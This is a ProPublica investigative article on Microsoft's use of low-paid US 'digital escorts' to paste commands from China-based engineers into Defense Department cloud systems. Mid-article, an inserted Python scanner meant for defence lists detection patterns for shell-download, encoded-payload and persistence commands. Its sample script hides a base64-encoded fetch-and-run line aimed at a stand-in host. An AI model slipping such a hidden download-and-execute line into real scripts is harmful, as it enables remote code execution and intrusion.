
WWW.PROPUBLICA.ORG
A Little-Known Microsoft Program Could Expose the Defense Department to Chinese Hackers
by Renee Dudley, with research by Doris Burke

ProPublica is a nonprofit newsroom that investigates abuses of power.

Microsoft is using engineers in China to help maintain the Defense Department's computer systems, with minimal supervision by U.S. personnel, leaving some of the nation's most sensitive data vulnerable to hacking from its leading cyber adversary, a ProPublica investigation has found.

The arrangement, which was critical to Microsoft winning the federal government's cloud computing business a decade ago, relies on U.S. citizens with security clearances to oversee the work and serve as a barrier against espionage and sabotage. But these workers, known as "digital escorts," often lack the technical expertise to police foreign engineers with far more advanced skills, ProPublica found. Some are former military personnel with little coding experience who are paid barely more than minimum wage for the work.

"We're trusting that what they're doing isn't malicious, but we really can't tell," said one current escort who agreed to speak on condition of anonymity, fearing professional repercussions.

The system has been in place for nearly a decade, though its existence is being reported publicly here for the first time.

Microsoft told ProPublica that it has disclosed details about the escort model to the federal government. But former government officials said in interviews that they had never heard of digital escorts. The program appears to be so low-profile that even the Defense Department's IT agency had difficulty finding someone familiar with it. "Literally no one seems to know anything about this, so I don't know where to go from here," said Deven King, spokesperson for the Defense Information Systems Agency.

National security and cybersecurity experts contacted by ProPublica were also surprised to learn that such an arrangement was in place, especially at a time when the U.S. intelligence community and leading members of Congress and the Trump administration view China's digital prowess as a top threat to the country.

The Office of the Director of National Intelligence has called China the "most active and persistent cyber threat to U.S. Government, private-sector, and critical infrastructure networks." One of the most prominent examples of that threat came in 2023, when Chinese hackers infiltrated the cloud-based mailboxes of senior U.S. government officials, stealing data and emails from the commerce secretary, the U.S. ambassador to China and others working on national security matters. The intruders downloaded about 60,000 emails from the State Department alone.

With President Donald Trump and his allies concerned about spying, the State Department announced plans in May to "aggressively revoke" visas for Chinese students, a pledge that the president seems to have walked back. The administration is also trying to arrange the sale of the popular social media platform TikTok, which is owned by a Chinese company that some lawmakers believe could hand over sensitive U.S. user data to Beijing and fuel misinformation with its content recommendations. But experts told ProPublica that digital escorting poses a far greater threat to national security than either of those issues and is a natural opportunity for spies.

"If I were an operative, I would look at that as an avenue for extremely valuable access. We need to be very concerned about that," said Harry Coker, who was a senior executive at the CIA and the National Security Agency. Coker, who also was national cyber director during the Biden administration, added that he and his former intelligence community colleagues "would love to have had access like that."

It is difficult to know whether engineers overseen by digital escorts have ever carried out a cyberattack against the U.S. government.
But Coker wondered whether it could be part of an explanation for "a lot of the challenges we have faced over the years."

Microsoft uses the escort system to handle the government's most sensitive information that falls below "classified." According to the government, this "high impact level" category includes data that involves "the protection of life and financial ruin." The loss of confidentiality, integrity, or availability of this information "could be expected to have a severe or catastrophic adverse effect" on operations, assets and individuals, the government has said. In the Defense Department, the data is categorized as "Impact Level" 4 and 5 and includes materials that directly support military operations.

John Sherman, who was chief information officer for the Department of Defense during the Biden administration, said he was surprised and concerned to learn of ProPublica's findings. "I probably should have known about this," he said. He told the news organization that the situation warrants "a thorough review by DISA, Cyber Command and other stakeholders that are involved in this."

In an emailed statement, the Defense Information Systems Agency said that cloud service providers "are required to establish and maintain controls for vetting and using qualified specialists," but the agency did not respond to ProPublica's questions regarding the digital escorts' qualifications.

It's unclear whether other cloud providers to the federal government use digital escorts as part of their tech support. Amazon Web Services and Google Cloud declined to comment on the record for this article. Oracle did not respond to requests for comment.

Microsoft declined to make executives available for interviews for this article. In response to emailed questions, the company provided a statement saying its personnel and contractors operate in a manner "consistent with US Government requirements and processes."

"Global workers have no direct access to customer data or customer systems," the statement said.
"Escorts with the appropriate clearances and training provide direct support. These personnel are provided specific training on protecting sensitive data, preventing harm, and use of the specific commands/controls within the environment."

In addition, Microsoft said it has an internal review process known as "Lockbox" to make sure "the request is deemed safe or has any cause for concern." A company spokesperson declined to provide specifics about how it works but said it's "built into the system" and involves review by a Microsoft employee in the U.S.

Over the years, various people involved in the work, including a Microsoft cybersecurity leader, warned the company that the arrangement is inherently risky, those people told ProPublica. Despite the presence of an escort, foreign engineers are privy to granular details about the federal cloud, the kind of information hackers could exploit. Moreover, the U.S. escorts overseeing these workers are ill equipped to spot suspicious activity, two of the people said.

Even those who helped develop the escort system acknowledge the people doing the work may not be able to detect problems.

"If someone ran a script called fix_servers.sh but it actually did something malicious then [escorts] would have no idea," Matthew Erickson, a former Microsoft engineer who worked on the escort system, told ProPublica in an email. That said, he maintained that the scope of systems they could disrupt is limited.

The Defense Department requires anyone working with its most sensitive data to be a U.S. citizen, U.S. national or permanent resident. "No Foreign persons may have such access," according to the department's cloud security requirements. Microsoft, however, has a global workforce, so it created the digital escort system as a work-around.

Here's an example of how it works and the risk it poses:

Tech support is needed on a Microsoft cloud product. A Microsoft engineer in China files an online ticket to take on the work.
A U.S.-based escort picks up the ticket.
The engineer and the escort meet on the Microsoft Teams conferencing platform.
The engineer sends computer commands to the U.S. escort, presenting an opportunity to insert malicious code.
The escort, who may not have advanced technical expertise, inputs the commands into the federal cloud system.

(Illustrations for ProPublica)

A Microsoft contractor called Insight Global posted an ad in January seeking an escort to bring engineers without security clearances "into the secured environment of the federal government" and to protect "confidential and secure information from spillage," an industry term for a data leak. The pay started at $18 an hour.

While the ad said that specific technical skills were "highly preferred" and "nice to have," the main prerequisite was possessing a valid "secret" level clearance issued by the Defense Department.

"People are getting these jobs because they are cleared, not because they're software engineers," said the escort who agreed to speak anonymously and who works for Insight Global.

Each month, the company's roughly 50-person escort team fields hundreds of interactions with Microsoft's China-based engineers and developers, inputting those workers' commands into federal networks, the employee said.

In a statement to ProPublica, Insight Global said it evaluates "the technical capabilities of each resource throughout the interview process to ensure they possess the technical skills required for the job," and provides training. The company noted that escorts also receive additional cyber and insider threat awareness training as part of the government security clearance process.

"While a security clearance may be required for the role, it is but one piece of the puzzle," the company said.
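The workflow above, and Erickson's point that a script called fix_servers.sh can do anything its name does not say, come down to one technical fact: the escort is shown a file name and a ticket summary, not what the commands do. The Python below is an added example for this page; it is not code from Microsoft, Insight Global or the Defense Department, and it is not a description of Microsoft's "Lockbox" review. It is a toy pre-execution gate that records a hash of the submitted command bundle for the audit trail, scans each line for a few generic risk indicators, and decodes embedded base64 literals so that an encoded payload is scanned in the clear rather than waved through as an opaque string. The indicator rules, the host address (203.0.113.5 is a documentation-range address) and both sample bundles are constructed for illustration.

```python
"""Toy pre-execution review gate for an escorted command bundle.

Added example, not code from Microsoft, Insight Global or the Defense
Department, and not a description of Microsoft's "Lockbox" review. A script
name such as fix_servers.sh and a ticket summary say nothing about what the
commands do, so the submitted text is inspected and recorded before it is
typed in. Indicator rules, hostnames (203.0.113.5 is a documentation-range
address) and both sample bundles are constructed for illustration.
"""
import base64
import binascii
import hashlib
import re
from dataclasses import dataclass

# Generic indicators a non-specialist escort could still be warned about.
# Illustrative, not a complete or vetted ruleset (constructed).
INDICATORS = {
    "remote_code_fetch": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"),
    "encoded_payload": re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba|z|da)?sh\b|\beval\b"),
    "new_credential": re.compile(r"\b(useradd|adduser|authorized_keys)\b|\bnet\s+user\b.*/add\b", re.I),
    "logging_tamper": re.compile(r"auditctl\s+-e\s+0\b|systemctl\s+(stop|disable)\s+(auditd|rsyslog)\b|\bhistory\s+-c\b"),
    "persistence": re.compile(r"\bcrontab\s+-|/etc/cron\.|/etc/systemd/system/\S+\.service"),
}

# Long runs of base64 alphabet: decoded and re-scanned instead of trusted.
B64_LITERAL = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")


@dataclass
class Finding:
    rule: str
    line_no: int   # line within the bundle (or within the decoded text)
    text: str
    decoded: bool  # True if found only after base64-decoding a literal


def scan_text(text: str, decoded: bool = False) -> list[Finding]:
    """Run every indicator over every line of `text`."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(rule, line_no, line.strip(), decoded))
    return findings


def decode_literals(text: str) -> list[str]:
    """Return the ASCII plaintext of every base64 literal in `text`."""
    out = []
    for match in B64_LITERAL.finditer(text):
        try:
            out.append(base64.b64decode(match.group(1), validate=True).decode("ascii"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: nothing to re-scan
    return out


def review_bundle(script_name: str, ticket_summary: str, body: str) -> dict:
    """Gate verdict plus the audit record an escort would keep for the session.

    The name and summary are recorded but play no part in the verdict:
    only the command text does.
    """
    findings = scan_text(body)
    for plaintext in decode_literals(body):
        findings.extend(scan_text(plaintext, decoded=True))
    return {
        "script_name": script_name,
        "ticket_summary": ticket_summary,
        "sha256": hashlib.sha256(body.encode("utf-8")).hexdigest(),
        "findings": findings,
        "verdict": "BLOCK" if findings else "ALLOW",
    }


# Constructed sample 1: routine patching with one hidden line. The payload is
# base64-encoded in code only so the example stays self-contained and offline.
HIDDEN_B64 = base64.b64encode(b"curl -s http://203.0.113.5/x | sh").decode("ascii")
FIX_SERVERS_SH = f"""#!/bin/sh
# fix_servers.sh -- routine patching (constructed sample, not a real ticket)
sudo apt-get update -y
sudo apt-get install --only-upgrade openssl -y
sudo systemctl restart nginx
echo '{HIDDEN_B64}' | base64 -d | sh
"""

# Constructed sample 2: the kind of firewall change a ticket might describe.
UPDATE_FIREWALL_SH = """#!/bin/sh
# update_firewall.sh -- allow the monitoring subnet (constructed sample)
sudo ufw allow from 10.20.0.0/24 to any port 9100 proto tcp
sudo ufw reload
"""

if __name__ == "__main__":
    for name, summary, body in (
        ("fix_servers.sh", "routine patching", FIX_SERVERS_SH),
        ("update_firewall.sh", "open monitoring port", UPDATE_FIREWALL_SH),
    ):
        record = review_bundle(name, summary, body)
        print(f"{name}: {record['verdict']} sha256={record['sha256'][:16]}...")
        for f in record["findings"]:
            where = "decoded" if f.decoded else f"line {f.line_no}"
            print(f"  [{f.rule}] ({where}) {f.text}")
```

Run stand-alone, the gate blocks fix_servers.sh on its last line twice: once for the encoded-payload pattern visible in the raw text, and once for the download-and-execute command that only appears after decoding, which is exactly what a copy-and-paste review never sees. The firewall bundle passes. The verdict ignores the script name and ticket summary on purpose; they are kept only so the hash, findings and stated intent end up in the same record for whoever later reviews the session.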
Microsoft did not respond to questions about Insight Global.

The Path of Least Resistance

When modern cloud technology emerged in the 2000s, offering on-demand computing power and data storage via the internet, it ushered in fundamental changes to federal government operations. For decades, federal departments used computer servers owned and operated by the government itself to house data and power networks. Shifting to the cloud meant moving that work to massive off-site data centers managed by tech companies. Federal officials believed that the cloud would provide greater power, efficiency and cost savings. But the transition also meant that the government would cede some control over who maintained and accessed its information to companies like Microsoft, whose employees would take over tasks previously handled by federal IT workers.

To address the risks of this revolution, the government started the Federal Risk and Authorization Management Program, known as FedRAMP, in 2011. Under the program, companies that wanted to sell their cloud services to the government had to establish how they would ensure that personnel working with sensitive federal data would have the requisite "access authorizations and background screenings." On top of that, the Defense Department had its own cloud guidelines, requiring that people handling sensitive data be U.S. citizens or permanent residents.

This presented an issue for Microsoft, given its reliance on a vast global workforce, with significant operations in India, China and the European Union. So the company tapped a senior program manager named Indy Crowley to put federal officials at ease. Known for his familiarity with the rules and his ability to converse in the government's acronym-heavy lingo, colleagues dubbed him the "FedRAMP whisperer."

In an interview, Crowley told ProPublica that he appealed directly to FedRAMP leadership, arguing that the relative risk from Microsoft's global workforce was minimal.
To make his point, he said he once grilled a FedRAMP official on the provenance of code in products supplied by other government vendors such as IBM. The official couldn't say with certainty that only U.S. citizens had worked on the product in question, he said. The cloud, Crowley argued, should not be treated any differently.

Crowley said he also met with prospective customers across the government and told ProPublica that the Defense Department was the one "making the most demands." Concerned about the company's global workforce, officials there asked him who from Microsoft would be "behind the curtain" working on the cloud. Given the department's citizenship requirements, the officials raised the possibility of Microsoft hiring "a bunch of U.S. citizens" to maintain the federal cloud directly, Crowley told ProPublica. For Microsoft, the suggestion was a nonstarter, Crowley said, because the increased labor costs of implementing it broadly would make a cloud transition prohibitively expensive for the government.

"It's always a balance between cost and level of effort and expertise," he told ProPublica. "So you find what's good enough."

Hiring virtual escorts to supervise Microsoft's foreign workforce emerged as the "path of least resistance," Crowley said.

Microsoft did not respond to ProPublica's questions about Crowley's account.

When he brought the concept back to Microsoft, colleagues had mixed reactions. Tom Keane, then the corporate vice president for Microsoft's cloud platform, Azure, embraced the idea, according to a former employee involved in the discussions, as it would allow the company to scale up. But that former employee, who was involved in cybersecurity strategy, told ProPublica they opposed the concept, viewing it as too risky from a security perspective.
Both Keane and Crowley dismissed the concerns, said the former employee, who left the company before the escort concept was deployed.

"People who got in the way of scaling up did not stay," the former employee told ProPublica.

Crowley said he did not recall the discussion. Keane did not respond to requests for comment.

On its march to becoming one of the world's most valuable companies, Microsoft has repeatedly prioritized corporate profit over customer security, ProPublica has found. Last year, the news organization reported that the tech giant ignored one of its own engineers when he repeatedly warned that a product flaw left the U.S. government exposed; state-sponsored Russian hackers later exploited that weakness in one of the largest cyberattacks in history. Microsoft has defended its decision not to address the flaw, saying that it received "multiple reviews" and that the company weighs a variety of factors when making security decisions.

A Skills Gap From the Start

The idea of an escort wasn't novel. The National Institute of Standards and Technology, which serves as the federal government's standards-setting body, had established recommendations on how IT maintenance should be performed on-site, such as in a restricted government office. "Maintenance personnel that lack appropriate security clearances or are not U.S. citizens must be escorted and supervised by approved organizational personnel who are fully cleared, have appropriate access authorizations, and are technically qualified," the guidelines state.

The government at the time specified the intent of the recommendation: to deny individuals who "lack appropriate security clearances ... or who are not U.S. citizens, visual and electronic access to sensitive government information."

But escorts in the cloud wouldn't necessarily be able to meet that goal, given the gap in technical expertise between them and the Microsoft counterparts they would be taking direction from.

That imbalance, though, was baked into the escorting model.

Erickson, the former Microsoft engineer who worked on the model, told ProPublica that escorts are "somewhat technically proficient," but mainly are just there to make sure the employees "don't accidentally or intentionally view passwords, customer data or personally identifiable information." If there are problems with the underlying cloud services, then only the people who work on those services at Microsoft would have the requisite knowledge to fix it, he said.

Advanced threats from foreign adversaries weren't on the radar for Erickson, who said he "didn't have any reason to suspect someone more just based on their country of origin."

"I don't think there is any extra threat from Microsoft employees based in other countries," he said.

(Illustration by Andrea Wise/ProPublica. Source images: Bevan Goldswain/Getty Images, kontekbrothers/Getty Images, amgun/Getty Images.)

Pradeep Nair, a former Microsoft vice president who said he helped develop the concept from the start, said that the digital escort strategy allowed the company to "go to market faster," positioning it to win major federal cloud contracts. He said that escorts complete role-specific training before touching any production system and that a variety of safeguards, including audit logs, the digital trail of system activity, could alert Microsoft or the government to potential problems. "Because these controls are stringent, residual risk is minimal," Nair said.

But legal and cybersecurity experts say such assumptions ignored the massive cyber threat from China in particular.
Around the time that Microsoft was developing its escort strategy, an attack attributed to Chinese state-sponsored hackers resulted in the largest breach of U.S. government data up to that point. The theft initially targeted a government contractor and eventually compromised the personal information of more than 22 million people, most of them applicants for federal security clearances.

Chinese laws allow government officials there to collect data "as long as they're doing something that they've deemed legitimate," said Jeremy Daum, senior research fellow at the Paul Tsai China Center at Yale Law School. Microsoft's China-based tech support for the U.S. government presents an opening for espionage, "whether it be putting someone who's already an intelligence professional into one of those jobs, or going to the people who are in the jobs and pumping them for information," Daum said. It would be difficult for any Chinese citizen or company to meaningfully resist a direct request from security forces or law enforcement.

Erickson acknowledged that having an escort "doesn't prevent foreign developers from doing bad things. It just allows for there to be a recording and a witness." He said if an escort suspects malicious activity, they will end the session and file an incident report to investigate further.

How much of this information federal officials understood is unclear.

A Microsoft spokesperson said the company described the digital escort model in the documents submitted to the government as part of cloud vendor authorization processes. However, it declined to provide those records or to tell ProPublica the exact language it used in them to describe the escort arrangement, citing the potential security risk of publicly disclosing it.

In addition to a third-party auditor, Microsoft's documentation theoretically would have been reviewed by multiple parties in the government, including FedRAMP and DISA. DISA said the materials are "not releasable to the public."
The General Services Administration, which houses FedRAMP, did not respond to requests for comment.

The Right Eyes for the Job?

In June 2016, Microsoft announced that it had received FedRAMP authorization to work with some of the government's most sensitive data. Matt Goodrich, then FedRAMP director, said at the time that the accreditation was a testament to Microsoft's ability to meet the government's "rigorous security requirements."

Around the same time, Microsoft put the escort concept into practice, engaging contacts from defense giant Lockheed Martin to hire cloud escorts, two people involved in the contract told ProPublica.

A project manager, who asked for anonymity to describe confidential discussions, told ProPublica that they were skeptical of the escort arrangement from the start and voiced those feelings to their Microsoft counterpart. The manager was especially concerned that the new hires would not have "the right eyes" for the job given the relatively low pay set by Microsoft, but the system went ahead anyway.

Lockheed Martin referred questions to Leidos, a company that took over Lockheed's IT business following a merger in 2016. Leidos declined to comment.

As Microsoft captured more of the government's business, the company turned to additional subcontractors, typically staffing companies, to hire more digital escorts. Analyzing profiles on LinkedIn, ProPublica identified at least two such firms: Insight Global and ASM Research, whose parent company is consulting giant Accenture. While the scope of each firm's business with Microsoft is unclear, ProPublica found more workers identifying themselves as digital escorts at Insight Global, many of them former military personnel, than at ASM. ASM and Accenture did not respond to requests for comment.

Concerns About China

Some Insight Global workers recognized the same problem as the former Lockheed manager: a mismatch in skills between the U.S.-based escorts and the Microsoft engineers they are supervising.
The engineers might briefly describe the job to be completed, for instance, updating a firewall, installing an update to fix a bug or reviewing logs to troubleshoot a problem. Then, with limited inspection, the escort copies and pastes the engineer's commands into the federal cloud.

"They're telling nontechnical people very technical directions," the current Insight Global escort said, adding that the arrangement presents "untold opportunities for hacking." As an example, they said the engineer could install an update allowing an outsider to access the network.

"Will that get caught? Absolutely," the escort told ProPublica. "Will that get caught before damage is done? No idea."

The escort was particularly concerned about the dozens of tickets a week filed by workers based in China. The attack targeting federal officials in 2023, in which Chinese hackers stole 60,000 emails, underscored that fear.

The federal Cyber Safety Review Board, which investigated the attack, blamed Microsoft for security lapses that gave hackers their opening. Its published report did not mention digital escorts, either as playing a role in the attack or as a risk to be mitigated. Sherman, the former chief information officer for the Defense Department, and Coker, the former intelligence official, who both also served as members of the CSRB, told ProPublica that they did not recall the board ever discussing digital escorting, which they said they now consider a major threat. The Trump administration has since disbanded the CSRB.

In its statement, Microsoft said it expects escorts to perform a variety of technical tasks, which are outlined in its contracts with vendors. Insight Global said it evaluates prospective hires to ensure they have those skills and trains new employees on "all applicable security and compliance policies provided by Microsoft."

But the Insight Global employee told ProPublica the training regimen doesn't come close to bridging the knowledge gap.
In addition, it is challenging for escorts to gain expertise on the job because the type of work they oversee varies widely. "It's not possible to get as trained up as you need to be on the wide array of things you need to look at," they said.

The escort said they repeatedly raised concerns about the knowledge gap to Microsoft, over several years and as recently as April, and to Insight Global's own attorneys. They said the digital escorts' relative inexperience, combined with Chinese laws that grant the country's officials broad authority to collect data, left U.S. government networks overly exposed. Microsoft repeatedly thanked the escort for raising the issues, while Insight Global said it would take them under advisement, the escort said. It is unclear whether Microsoft or Insight Global took any steps to address them; neither company answered questions about the escort's account.

In its statement, Microsoft said it meets regularly with its contractors to discuss operations and surface questions or concerns. The company also noted that it has "additional layers of security and monitoring controls," including "automated code reviews to quickly detect and prevent the introduction of vulnerabilities."

"Microsoft assumes anyone that has access to production systems, regardless of location or role, can pose a risk to the system, whether intentionally or unintentionally," the company said in its statement.

Another Warning, a Growing Risk

Last year, about three months after government investigators released their report on the 2023 hack into U.S. officials' emails, a former Insight Global contractor named Tom Schiller contacted a Defense Department hotline and wrote to several federal lawmakers to warn them about digital escorting. He had become familiar with the system while briefly working for the company as a software developer. By last July, Schiller's complaints wound their way to the Defense Information Systems Agency Office of the Inspector General.
Schiller told ProPublica that the office conducted a sworn interview with him, and separately with three others connected to Insight Global. In August, the inspector general wrote to Schiller to say it had closed the case.

"We conducted a preliminary analysis into the complaint and determined this matter is not within the avenue of redress by DISA IG and is best addressed by the appropriate DISA management," the assistant inspector general for investigations said in the letter. "We have referred the information you provided to management."

A spokesperson for the inspector general, whose office is supposed to operate independently in order to investigate potential waste, fraud and abuse, told ProPublica they were not authorized to speak about the issue and directed questions to DISA public affairs.

"If the public information office contacts me and wants to collaborate to formulate a response through their office, I'll be more than happy to do that," the spokesperson said. "But I will not be responding to any kind of media request concerning OIG business without speaking with the public information office."

DISA public affairs did not answer questions about the matter. After a spokesperson initially said that he couldn't find anyone who had heard of the escort concept, the agency later acknowledged in a statement to ProPublica that escorts are used in "select unclassified environments" at the Defense Department for "advanced problem diagnosis and resolution from industry subject matter experts."
Echoing Microsoft's statement, it continued, "Experts under escort supervision have no direct, hands-on access to government systems; but rather offer guidance and recommendations to authorized administrators who perform tasks."

It is unclear what, if any, discussions have taken place among Microsoft, Insight Global and DISA, or any other government agency, regarding digital escorts.

But David Mihelcic, DISA's former chief technology officer, said any visibility into the Defense Department's network poses a huge risk.

"Here you have one person you really don't trust because they're probably in the Chinese intelligence service, and the other person is not really capable," he said.

The risk may be getting more serious by the day, as U.S.-China relations worsen amid a simmering trade war, the type of conflict that experts say could result in Chinese cyber retaliation.

In testimony to a Senate committee in May, Microsoft President Brad Smith said the company is "continually pushing Chinese out of agencies." He did not elaborate on how they got in, and Microsoft did not respond to follow-up questions on the remark.